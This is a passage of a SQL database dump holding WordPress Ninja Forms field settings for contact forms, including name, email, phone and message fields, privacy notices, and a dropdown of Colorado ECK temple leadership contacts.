left'),(11243,357,'label_pos','above','label_pos','above'),(11244,357,'placeholder','','placeholder',''),(11245,357,'first_name','','first_name',''),(11246,357,'last_name','','last_name',''),(11247,357,'user_address_1','','user_address_1',''),(11248,357,'user_address_2','','user_address_2',''),(11249,357,'user_city','','user_city',''),(11250,357,'user_zip','','user_zip',''),(11251,357,'user_phone','','user_phone',''),(11252,357,'user_email','','user_email',''),(11253,357,'user_info_field_group','1','user_info_field_group','1'),(11254,357,'disable_input','0','disable_input','0'),(11255,357,'mask','','mask',''),(11256,357,'input_limit','','input_limit',''),(11257,357,'input_limit_type','char','input_limit_type','char'),(11258,357,'calc_auto_include','0','calc_auto_include','0'),(11259,357,'datepicker','0','datepicker','0'),(11260,357,'user_state','0','user_state','0'),(11261,357,'autocomplete_off','0','autocomplete_off','0'),(11262,357,'num_sort','0','num_sort','0'),(11263,357,'admin_label','','admin_label',''),(11264,357,'user_info_field_group_name','','user_info_field_group_name',''),(11265,357,'user_info_field_group_custom','','user_info_field_group_custom',''),(11266,357,'show_help','0','show_help','0'),(11267,357,'help_text','','help_text',''),(11268,357,'show_desc','0','show_desc','0'),(11269,357,'desc_pos','none','desc_pos','none'),(11270,357,'desc_text','','desc_text',''),(11271,357,'element_class','','element_class',''),(11272,357,'required','1','required','1'),(11273,357,'key','textbox_303','key','textbox_303'),(11274,357,'parent_id','13','parent_id','13'),(11275,357,'editActive','','editActive',''),(11276,357,'field_label','Message Subject','field_label','Message Subject'),(11277,357,'field_key','textbox_303','field_key','textbox_303'),(11278,357,'default','','default',''),(11279,357,'container_class','','container_class',''),(11280,357,'manual_key','','manual_key',''),(11281,357,'custom_mask','','custom_mask',''),(11282,357,'custom_name_attribute','','custom_name_attribute',''),(11283,357,'personally_identifiable','','personally_identifiable',''),(11284,357,'value','','value',''),(11285,358,'type','textarea','type','textarea'),(11286,358,'order','6','order','6'),(11287,358,'fav_id','','fav_id',''),(11288,358,'def_id','','def_id',''),(11289,358,'label','Enter Your Message Here','label','Enter Your Message Here'),(11290,358,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11291,358,'label_pos','above','label_pos','above'),(11292,358,'default_value','','default_value',''),(11293,358,'textarea_rte','0','textarea_rte','0'),(11294,358,'textarea_media','0','textarea_media','0'),(11295,358,'disable_rte_mobile','0','disable_rte_mobile','0'),(11296,358,'input_limit','','input_limit',''),(11297,358,'input_limit_type','char','input_limit_type','char'),(11298,358,'calc_auto_include','0','calc_auto_include','0'),(11299,358,'num_sort','0','num_sort','0'),(11300,358,'admin_label','','admin_label',''),(11301,358,'show_help','0','show_help','0'),(11302,358,'help_text','','help_text',''),(11303,358,'show_desc','0','show_desc','0'),(11304,358,'desc_pos','none','desc_pos','none'),(11305,358,'desc_text','','desc_text',''),(11306,358,'element_class','','element_class',''),(11307,358,'required','1','required','1'),(11308,358,'default','','default',''),(11309,358,'key','textarea_276','key','textarea_276'),(11310,358,'parent_id','13','parent_id','13'),(11311,358,'editActive','','editActive',''),(11312,358,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(11313,358,'field_key','textarea_276','field_key','textarea_276'),(11314,358,'placeholder','','placeholder',''),(11315,358,'container_class','','container_class',''),(11316,358,'manual_key','','manual_key',''),(11317,358,'value','','value',''),(11318,359,'type','html','type','html'),(11319,359,'order','7','order','7'),(11320,359,'fav_id','','fav_id',''),(11321,359,'def_id','','def_id',''),(11322,359,'label','Text','label','Text'),(11323,359,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11324,359,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(11325,359,'desc_el','div','desc_el','div'),(11326,359,'show_desc','0','show_desc','0'),(11327,359,'desc_pos','none','desc_pos','none'),(11328,359,'desc_text','','desc_text',''),(11329,359,'element_class','','element_class',''),(11330,359,'default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(11331,359,'key','html_305','key','html_305'),(11332,359,'parent_id','13','parent_id','13'),(11333,359,'editActive','','editActive',''),(11334,359,'field_label','Text','field_label','Text'),(11335,359,'field_key','html_305','field_key','html_305'),(11336,359,'container_class','','container_class',''),(17391,613,'idAttribute','id','idAttribute','id'),(17390,613,'order','14','order','14'),(17388,612,'drawerDisabled','','drawerDisabled',''),(17389,613,'editActive','','editActive',''),(17387,612,'key','html_1663797542883','key','html_1663797542883'),(17386,612,'element_class','','element_class',''),(17385,612,'container_class','','container_class',''),(17384,612,'default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17383,612,'type','html','type','html'),(17382,612,'label','HTML','label','HTML'),(11356,361,'type','submit','type','submit'),(11357,361,'order','9','order','9'),(11358,361,'fav_id','','fav_id',''),(11359,361,'def_id','','def_id',''),(11360,361,'label','Submit','label','Submit'),(11361,361,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11362,361,'show_help','0','show_help','0'),(11363,361,'help_text','','help_text',''),(11364,361,'show_desc','0','show_desc','0'),(11365,361,'desc_pos','none','desc_pos','none'),(11366,361,'desc_text','','desc_text',''),(11367,361,'processing_label','Processing','processing_label','Processing'),(11368,361,'element_class','','element_class',''),(11369,361,'key','submit_278','key','submit_278'),(11370,361,'parent_id','13','parent_id','13'),(11371,361,'editActive','','editActive',''),(11372,361,'field_label','Submit','field_label','Submit'),(11373,361,'field_key','submit_278','field_key','submit_278'),(11374,361,'container_class','','container_class',''),(11375,362,'objectType','Field','objectType','Field'),(11376,362,'objectDomain','fields','objectDomain','fields'),(11377,362,'editActive','','editActive',''),(11378,362,'order','1','order','1'),(11379,362,'type','textbox','type','textbox'),(11380,362,'fav_id','','fav_id',''),(11381,362,'def_id','6','def_id','6'),(11382,362,'label','First Name','label','First Name'),(11383,362,'label_pos','above','label_pos','above'),(11384,362,'mask','','mask',''),(11385,362,'datepicker','0','datepicker','0'),(11386,362,'first_name','1','first_name','1'),(11387,362,'last_name','0','last_name','0'),(11388,362,'from_name','0','from_name','0'),(11389,362,'user_info_field_group','1','user_info_field_group','1'),(11390,362,'show_help','0','show_help','0'),(11391,362,'help_text','','help_text',''),(11392,362,'calc_auto_include','0','calc_auto_include','0'),(11393,362,'calc_option','0','calc_option','0'),(11394,362,'placeholder','','placeholder',''),(11395,362,'user_address_1','','user_address_1',''),(11396,362,'user_address_2','','user_address_2',''),(11397,362,'user_city','','user_city',''),(11398,362,'user_zip','','user_zip',''),(11399,362,'user_phone','','user_phone',''),(11400,362,'user_email','','user_email',''),(11401,362,'disable_input','0','disable_input','0'),(11402,362,'input_limit','','input_limit',''),(11403,362,'input_limit_type','char','input_limit_type','char'),(11404,362,'input_limit_msg','','input_limit_msg',''),(11405,362,'user_state','0','user_state','0'),(11406,362,'autocomplete_off','0','autocomplete_off','0'),(11407,362,'num_sort','0','num_sort','0'),(11408,362,'admin_label','','admin_label',''),(11409,362,'user_info_field_group_name','','user_info_field_group_name',''),(11410,362,'user_info_field_group_custom','','user_info_field_group_custom',''),(11411,362,'show_desc','0','show_desc','0'),(11412,362,'desc_pos','none','desc_pos','none'),(11413,362,'desc_text','','desc_text',''),(11414,362,'element_class','','element_class',''),(11415,362,'required','1','required','1'),(11416,362,'key','textbox_268','key','textbox_268'),(11417,362,'field_label','First Name','field_label','First Name'),(11418,362,'field_key','textbox_268','field_key','textbox_268'),(11419,362,'default','','default',''),(11420,362,'container_class','one-half first','container_class','one-half first'),(11421,362,'manual_key','','manual_key',''),(11422,362,'custom_mask','','custom_mask',''),(11423,362,'custom_name_attribute','','custom_name_attribute',''),(11424,362,'personally_identifiable','','personally_identifiable',''),(11425,362,'value','','value',''),(11426,362,'parent_id','35','parent_id','35'),(11427,363,'objectType','Field','objectType','Field'),(11428,363,'objectDomain','fields','objectDomain','fields'),(11429,363,'editActive','','editActive',''),(11430,363,'order','2','order','2'),(11431,363,'type','lastname','type','lastname'),(11432,363,'fav_id','','fav_id',''),(11433,363,'def_id','7','def_id','7'),(11434,363,'label','Last Name','label','Last Name'),(11435,363,'label_pos','above','label_pos','above'),(11436,363,'mask','','mask',''),(11437,363,'datepicker','0','datepicker','0'),(11438,363,'first_name','0','first_name','0'),(11439,363,'from_name','0','from_name','0'),(11440,363,'user_info_field_group','1','user_info_field_group','1'),(11441,363,'show_help','0','show_help','0'),(11442,363,'help_text','','help_text',''),(11443,363,'calc_auto_include','0','calc_auto_include','0'),(11444,363,'calc_option','0','calc_option','0'),(11445,363,'placeholder','','placeholder',''),(11446,363,'user_address_1','','user_address_1',''),(11447,363,'user_address_2','','user_address_2',''),(11448,363,'user_city','','user_city',''),(11449,363,'user_zip','','user_zip',''),(11450,363,'user_phone','','user_phone',''),(11451,363,'user_email','','user_email',''),(11452,363,'disable_input','0','disable_input','0'),(11453,363,'input_limit','','input_limit',''),(11454,363,'input_limit_type','char','input_limit_type','char'),(11455,363,'input_limit_msg','','input_limit_msg',''),(11456,363,'user_state','0','user_state','0'),(11457,363,'autocomplete_off','0','autocomplete_off','0'),(11458,363,'num_sort','0','num_sort','0'),(11459,363,'admin_label','','admin_label',''),(11460,363,'user_info_field_group_name','','user_info_field_group_name',''),(11461,363,'user_info_field_group_custom','','user_info_field_group_custom',''),(11462,363,'show_desc','0','show_desc','0'),(11463,363,'desc_pos','none','desc_pos','none'),(11464,363,'desc_text','','desc_text',''),(11465,363,'element_class','','element_class',''),(11466,363,'required','1','required','1'),(11467,363,'key','lastname_269','key','lastname_269'),(11468,363,'field_label','Last Name','field_label','Last Name'),(11469,363,'field_key','lastname_269','field_key','lastname_269'),(11470,363,'default','','default',''),(11471,363,'container_class','one-half','container_class','one-half'),(11472,363,'custom_name_attribute','lname','custom_name_attribute','lname'),(11473,363,'personally_identifiable','1','personally_identifiable','1'),(11474,363,'value','','value',''),(11475,363,'parent_id','35','parent_id','35'),(11476,363,'drawerDisabled','','drawerDisabled',''),(11477,364,'objectType','Field','objectType','Field'),(11478,364,'objectDomain','fields','objectDomain','fields'),(11479,364,'editActive','','editActive',''),(11480,364,'order','4','order','4'),(11481,364,'type','email','type','email'),(11482,364,'fav_id','','fav_id',''),(11483,364,'def_id','14','def_id','14'),(11484,364,'label','Email','label','Email'),(11485,364,'label_pos','above','label_pos','above'),(11486,364,'mask','','mask',''),(11487,364,'datepicker','0','datepicker','0'),(11488,364,'first_name','0','first_name','0'),(11489,364,'last_name','0','last_name','0'),(11490,364,'from_name','0','from_name','0'),(11491,364,'user_address_1','0','user_address_1','0'),(11492,364,'user_address_2','0','user_address_2','0'),(11493,364,'user_city','0','user_city','0'),(11494,364,'user_zip','0','user_zip','0'),(11495,364,'user_phone','0','user_phone','0'),(11496,364,'user_info_field_group','1','user_info_field_group','1'),(11497,364,'show_help','0','show_help','0'),(11498,364,'help_text','','help_text',''),(11499,364,'calc_auto_include','0','calc_auto_include','0'),(11500,364,'calc_option','0','calc_option','0'),(11501,364,'placeholder','','placeholder',''),(11502,364,'disable_input','0','disable_input','0'),(11503,364,'input_limit','','input_limit',''),(11504,364,'input_limit_type','char','input_limit_type','char'),(11505,364,'input_limit_msg','','input_limit_msg',''),(11506,364,'user_state','0','user_state','0'),(11507,364,'autocomplete_off','0','autocomplete_off','0'),(11508,364,'num_sort','0','num_sort','0'),(11509,364,'admin_label','','admin_label',''),(11510,364,'user_info_field_group_name','','user_info_field_group_name',''),(11511,364,'user_info_field_group_custom','','user_info_field_group_custom',''),(11512,364,'show_desc','0','show_desc','0'),(11513,364,'desc_pos','none','desc_pos','none'),(11514,364,'desc_text','','desc_text',''),(11515,364,'element_class','','element_class',''),(11516,364,'required','1','required','1'),(11517,364,'key','email_270','key','email_270'),(11518,364,'field_label','Email','field_label','Email'),(11519,364,'field_key','email_270','field_key','email_270'),(11520,364,'default','','default',''),(11521,364,'container_class','one-half','container_class','one-half'),(11522,364,'custom_name_attribute','email','custom_name_attribute','email'),(11523,364,'personally_identifiable','1','personally_identifiable','1'),(11524,364,'value','','value',''),(11525,364,'parent_id','35','parent_id','35'),(11526,364,'drawerDisabled','','drawerDisabled',''),(11527,365,'objectType','Field','objectType','Field'),(11528,365,'objectDomain','fields','objectDomain','fields'),(11529,365,'editActive','','editActive',''),(11530,365,'order','5','order','5'),(11531,365,'type','textbox','type','textbox'),(11532,365,'fav_id','','fav_id',''),(11533,365,'def_id','','def_id',''),(11534,365,'label','Message Subject','label','Message Subject'),(11535,365,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11536,365,'label_pos','above','label_pos','above'),(11537,365,'placeholder','','placeholder',''),(11538,365,'first_name','','first_name',''),(11539,365,'last_name','','last_name',''),(11540,365,'user_address_1','','user_address_1',''),(11541,365,'user_address_2','','user_address_2',''),(11542,365,'user_city','','user_city',''),(11543,365,'user_zip','','user_zip',''),(11544,365,'user_phone','','user_phone',''),(11545,365,'user_email','','user_email',''),(11546,365,'user_info_field_group','1','user_info_field_group','1'),(11547,365,'disable_input','0','disable_input','0'),(11548,365,'mask','','mask',''),(11549,365,'input_limit','','input_limit',''),(11550,365,'input_limit_type','char','input_limit_type','char'),(11551,365,'calc_auto_include','0','calc_auto_include','0'),(11552,365,'datepicker','0','datepicker','0'),(11553,365,'user_state','0','user_state','0'),(11554,365,'autocomplete_off','0','autocomplete_off','0'),(11555,365,'num_sort','0','num_sort','0'),(11556,365,'admin_label','','admin_label',''),(11557,365,'user_info_field_group_name','','user_info_field_group_name',''),(11558,365,'user_info_field_group_custom','','user_info_field_group_custom',''),(11559,365,'show_help','0','show_help','0'),(11560,365,'help_text','','help_text',''),(11561,365,'show_desc','0','show_desc','0'),(11562,365,'desc_pos','none','desc_pos','none'),(11563,365,'desc_text','','desc_text',''),(11564,365,'element_class','','element_class',''),(11565,365,'required','1','required','1'),(11566,365,'key','textbox_303','key','textbox_303'),(11567,365,'field_label','Message Subject','field_label','Message Subject'),(11568,365,'field_key','textbox_303','field_key','textbox_303'),(11569,365,'default','','default',''),(11570,365,'container_class','','container_class',''),(11571,365,'manual_key','','manual_key',''),(11572,365,'custom_mask','','custom_mask',''),(11573,365,'custom_name_attribute','','custom_name_attribute',''),(11574,365,'personally_identifiable','','personally_identifiable',''),(11575,365,'value','','value',''),(11576,365,'parent_id','35','parent_id','35'),(11577,366,'objectType','Field','objectType','Field'),(11578,366,'objectDomain','fields','objectDomain','fields'),(11579,366,'editActive','','editActive',''),(11580,366,'order','6','order','6'),(11581,366,'type','textarea','type','textarea'),(11582,366,'fav_id','','fav_id',''),(11583,366,'def_id','','def_id',''),(11584,366,'label','Please Enter Your Message Here','label','Please Enter Your Message Here'),(11585,366,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11586,366,'label_pos','above','label_pos','above'),(11587,366,'default_value','','default_value',''),(11588,366,'textarea_rte','0','textarea_rte','0'),(11589,366,'textarea_media','0','textarea_media','0'),(11590,366,'disable_rte_mobile','0','disable_rte_mobile','0'),(11591,366,'input_limit','','input_limit',''),(11592,366,'input_limit_type','char','input_limit_type','char'),(11593,366,'calc_auto_include','0','calc_auto_include','0'),(11594,366,'num_sort','0','num_sort','0'),(11595,366,'admin_label','','admin_label',''),(11596,366,'show_help','0','show_help','0'),(11597,366,'help_text','','help_text',''),(11598,366,'show_desc','0','show_desc','0'),(11599,366,'desc_pos','none','desc_pos','none'),(11600,366,'desc_text','','desc_text',''),(11601,366,'element_class','','element_class',''),(11602,366,'required','1','required','1'),(11603,366,'default','','default',''),(11604,366,'key','please_enter_your_message_here_1599585729237','key','please_enter_your_message_here_1599585729237'),(11605,366,'field_label','Please Enter Your Message Here','field_label','Please Enter Your Message Here'),(11606,366,'field_key','please_enter_your_message_here_1599585729237','field_key','please_enter_your_message_here_1599585729237'),(11607,366,'placeholder','','placeholder',''),(11608,366,'container_class','','container_class',''),(11609,366,'manual_key','','manual_key',''),(11610,366,'value','','value',''),(11611,366,'parent_id','35','parent_id','35'),(11612,366,'drawerDisabled','','drawerDisabled',''),(11613,367,'objectType','Field','objectType','Field'),(11614,367,'objectDomain','fields','objectDomain','fields'),(11615,367,'editActive','','editActive',''),(11616,367,'order','7','order','7'),(11617,367,'type','html','type','html'),(11618,367,'fav_id','','fav_id',''),(11619,367,'def_id','','def_id',''),(11620,367,'label','Text','label','Text'),(11621,367,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11622,367,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(11623,367,'desc_el','div','desc_el','div'),(11624,367,'show_desc','0','show_desc','0'),(11625,367,'desc_pos','none','desc_pos','none'),(11626,367,'desc_text','','desc_text',''),(11627,367,'element_class','','element_class',''),(11628,367,'default','<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>','default','<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>'),(11629,367,'key','html_305','key','html_305'),(11630,367,'field_label','Text','field_label','Text'),(11631,367,'field_key','html_305','field_key','html_305'),(11632,367,'container_class','','container_class',''),(11633,367,'parent_id','35','parent_id','35'),(11634,367,'drawerDisabled','','drawerDisabled',''),(17046,599,'key','html_267','key','html_267'),(17427,617,'editActive','','editActive',''),(17425,616,'key','html_1663797605970','key','html_1663797605970'),(17426,616,'drawerDisabled','','drawerDisabled',''),(17424,616,'element_class','','element_class',''),(17423,616,'container_class','','container_class',''),(11657,369,'objectType','Field','objectType','Field'),(11658,369,'objectDomain','fields','objectDomain','fields'),(11659,369,'editActive','','editActive',''),(11660,369,'order','9','order','9'),(11661,369,'type','submit','type','submit'),(11662,369,'fav_id','','fav_id',''),(11663,369,'def_id','','def_id',''),(11664,369,'label','Submit','label','Submit'),(11665,369,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11666,369,'show_help','0','show_help','0'),(11667,369,'help_text','','help_text',''),(11668,369,'show_desc','0','show_desc','0'),(11669,369,'desc_pos','none','desc_pos','none'),(11670,369,'desc_text','','desc_text',''),(11671,369,'processing_label','Processing','processing_label','Processing'),(11672,369,'element_class','','element_class',''),(11673,369,'key','submit_278','key','submit_278'),(11674,369,'field_label','Submit','field_label','Submit'),(11675,369,'field_key','submit_278','field_key','submit_278'),(11676,369,'container_class','','container_class',''),(11677,369,'parent_id','35','parent_id','35'),(11678,370,'drawerDisabled','','drawerDisabled',''),(11679,370,'mask','','mask',''),(11680,370,'custom_mask','','custom_mask',''),(11681,370,'custom_name_attribute','phone','custom_name_attribute','phone'),(11682,370,'personally_identifiable','1','personally_identifiable','1'),(11683,370,'value','','value',''),(11684,370,'help_text','','help_text',''),(11685,370,'admin_label','','admin_label',''),(11686,370,'manual_key','','manual_key',''),(11687,370,'type','phone','type','phone'),(11688,370,'key','phone_1599585699152','key','phone_1599585699152'),(11689,370,'label_pos','default','label_pos','default'),(11690,370,'required','1','required','1'),(11691,370,'default','','default',''),(11692,370,'placeholder','','placeholder',''),(11693,370,'container_class','one-half first','container_class','one-half first'),(11694,370,'element_class','','element_class',''),(11695,370,'input_limit','','input_limit',''),(11696,370,'input_limit_type','characters','input_limit_type','characters'),(11697,370,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(11698,370,'label','Phone','label','Phone'),(11699,370,'editActive','','editActive',''),(11700,370,'order','3','order','3'),(11701,370,'field_label','Phone','field_label','Phone'),(11702,370,'field_key','phone_1599585699152','field_key','phone_1599585699152'),(11703,97,'drawerDisabled','','drawerDisabled',''),(11704,98,'drawerDisabled','','drawerDisabled',''),(11705,100,'drawerDisabled','','drawerDisabled',''),(11706,101,'drawerDisabled','','drawerDisabled',''),(11707,128,'drawerDisabled','','drawerDisabled',''),(11708,174,'drawerDisabled','','drawerDisabled',''),(11709,195,'drawerDisabled','','drawerDisabled',''),(11710,194,'drawerDisabled','','drawerDisabled',''),(11711,50,'drawerDisabled','','drawerDisabled',''),(11712,46,'drawerDisabled','','drawerDisabled',''),(11713,162,'drawerDisabled','','drawerDisabled',''),(11714,207,'drawerDisabled','','drawerDisabled',''),(11715,212,'drawerDisabled','','drawerDisabled',''),(11716,241,'drawerDisabled','','drawerDisabled',''),(11717,253,'drawerDisabled','','drawerDisabled',''),(12280,381,'key','listselect_25','key','listselect_25'),(12281,381,'container_class','','container_class',''),(12282,381,'parent_id','8','parent_id','8'),(12283,381,'idAttribute','id','idAttribute','id'),(12284,381,'field_label','Your Local Area','field_label','Your Local Area'),(12285,381,'field_key','listselect_25','field_key','listselect_25'),(12286,382,'objectType','Field','objectType','Field'),(12287,382,'objectDomain','fields','objectDomain','fields'),(12288,382,'editActive','','editActive',''),(12289,382,'order','6','order','6'),(12290,382,'type','hr','type','hr'),(12291,382,'label','hr','label','hr'),(12292,382,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(12293,382,'show_desc','0','show_desc','0'),(12294,382,'desc_pos','none','desc_pos','none'),(12295,382,'desc_text','','desc_text',''),(12296,382,'element_class','','element_class',''),(12297,382,'key','hr_26','key','hr_26'),(12298,382,'container_class','','container_class',''),(12299,382,'parent_id','8','parent_id','8'),(12300,382,'idAttribute','id','idAttribute','id'),(12301,382,'field_label','hr','field_label','hr'),(12302,382,'field_key','hr_26','field_key','hr_26'),(12303,383,'objectType','Field','objectType','Field'),(12304,383,'objectDomain','fields','objectDomain','fields'),(12305,383,'editActive','','editActive',''),(12306,383,'order','7','order','7'),(12307,383,'type','html','type','html'),(12308,383,'label','Colorado Leadership Positions','label','Colorado Leadership Positions'),(12309,383,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(12310,383,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>'),(12311,383,'desc_el','div','desc_el','div'),(12312,383,'show_desc','0','show_desc','0'),(12313,383,'desc_pos','none','desc_pos','none'),(12314,383,'desc_text','','desc_text',''),(12315,383,'element_class','','element_class',''),(12316,383,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>'),(12317,383,'key','html_27','key','html_27'),(12318,383,'container_class','','container_class',''),(12319,383,'parent_id','8','parent_id','8'),(12320,383,'idAttribute','id','idAttribute','id'),(12321,383,'field_label','Colorado Leadership Positions','field_label','Colorado Leadership Positions'),(12322,383,'field_key','html_27','field_key','html_27'),(12323,384,'objectType','Field','objectType','Field'),(12324,384,'objectDomain','fields','objectDomain','fields'),(12325,384,'editActive','','editActive',''),(12326,384,'order','8','order','8'),(12327,384,'type','listselect','type','listselect'),(12328,384,'label','Select the person you would like to email','label','Select the person you would like to email'),(12329,384,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(12330,384,'label_pos','above','label_pos','above'),(12331,384,'list_type','dropdown','list_type','dropdown'),(12332,384,'multi_size','5','multi_size','5'),(12333,384,'list_show_value','1','list_show_value','1'),(12334,384,'list','a:0:{}','list','a:0:{}'),(12335,384,'user_info_field_group','','user_info_field_group',''),(12336,384,'calc_auto_include','0','calc_auto_include','0'),(12337,384,'user_state','0','user_state','0'),(12338,384,'num_sort','0','num_sort','0'),(12339,384,'admin_label','','admin_label',''),(12340,384,'show_help','0','show_help','0'),(12341,384,'help_text','','help_text',''),(12342,384,'show_desc','0','show_desc','0'),(12343,384,'desc_pos','none','desc_pos','none'),(12344,384,'desc_text','','desc_text',''),(12345,384,'element_class','','element_class',''),(12346,384,'required','1','required','1'),(12347,384,'options','a:5:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"ECK Temple Director\";s:5:\"value\";s:19:\"eck-temple-director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ECK Temple Vahana Leader\";s:5:\"value\";s:24:\"ECK Temple Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span 